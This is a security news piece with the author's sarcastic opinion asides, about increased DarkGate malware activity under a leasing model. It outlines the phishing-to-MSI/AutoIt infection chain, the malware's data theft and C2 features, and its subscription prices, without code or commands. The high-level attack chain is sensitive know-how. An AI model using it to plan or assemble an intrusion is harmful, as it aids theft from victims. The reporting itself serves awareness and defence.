A surge in DarkGate malware activity has been detected – a development that aligns with recent actions of the malware’s developer who has begun leasing out the software to a select group of affiliates, according to a report by Telekom Security.
This uptick in DarkGate’s use builds upon the recent findings of security researcher Igal Lytzki, who reported a “high volume campaign” that uses hijacked email threads to trick users into downloading the malware.
The attack begins with a phishing URL. Once clicked, it navigates through a traffic direction system (TDS), leading the victim to an MSI payload under certain conditions, such as the presence of a refresh header in the HTTP response. Opening the MSI file initiates a multi-stage process involving an AutoIt script that executes shellcode, serving as a pathway to decrypt and launch DarkGate via a crypter, (loader). The loader’s primary function is to parse the AutoIt script and extract the encrypted malware sample.
There have also been sightings of an alternate attack pattern that employs a VB (Visual Basic) Script instead of an MSI file. This variation uses cURL to retrieve the AutoIt executable and script file. However, the exact delivery method of the VB Script remains unclear.
DarkGate, primarily sold on underground forums by a user named RastaFarEye, boasts features designed to dodge detection by security software. It can establish persistence through modifications to the Windows Registry, escalate privileges, and pilfer data from web browsers and other software, including Discord and FileZilla. Most of these modifications can be caught by modern EDR / XDR solutions.
The malware also sets up communication with a command-and-control (C2) server, which allows for file enumeration, data exfiltration, the launch of cryptocurrency miners, remote screenshot capture, and the execution of other commands. The malware is available on a subscription basis, with prices ranging from $1,000 per day to $15,000 per month, up to $100,000 a year.
Opinion: If you’re paying $100,000 per year for some piece of shit malware that isn’t going to work in a few months and is already on everyone’s radar, then you’re definitely dumber than the guy who wrote it and took your money.
The author promotes it as the “ultimate tool for pentesters/redteamers,” boasting of features that are unique to DarkGate.
Additional opinion: See? He is smart. It’s a “pentesting tool” not a “do crimes app”
Notably, earlier versions of DarkGate were equipped with a ransomware module. Phishing attacks remain a primary delivery method for stealers, trojans, and malware loaders such as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, among others.
Threat actors continue to enhance and expand their functionalities. A recent report by HP Wolf Security revealed that email is the most common vector for delivering malware to endpoints, accounting for 79% of threats identified in Q2 2023.
Final Thought: Maybe I sound like Jerry McGuire when I say this, but Please stop trying to read email faster than everyone and ignoring who’s sending it to you. Clicking is a privelege.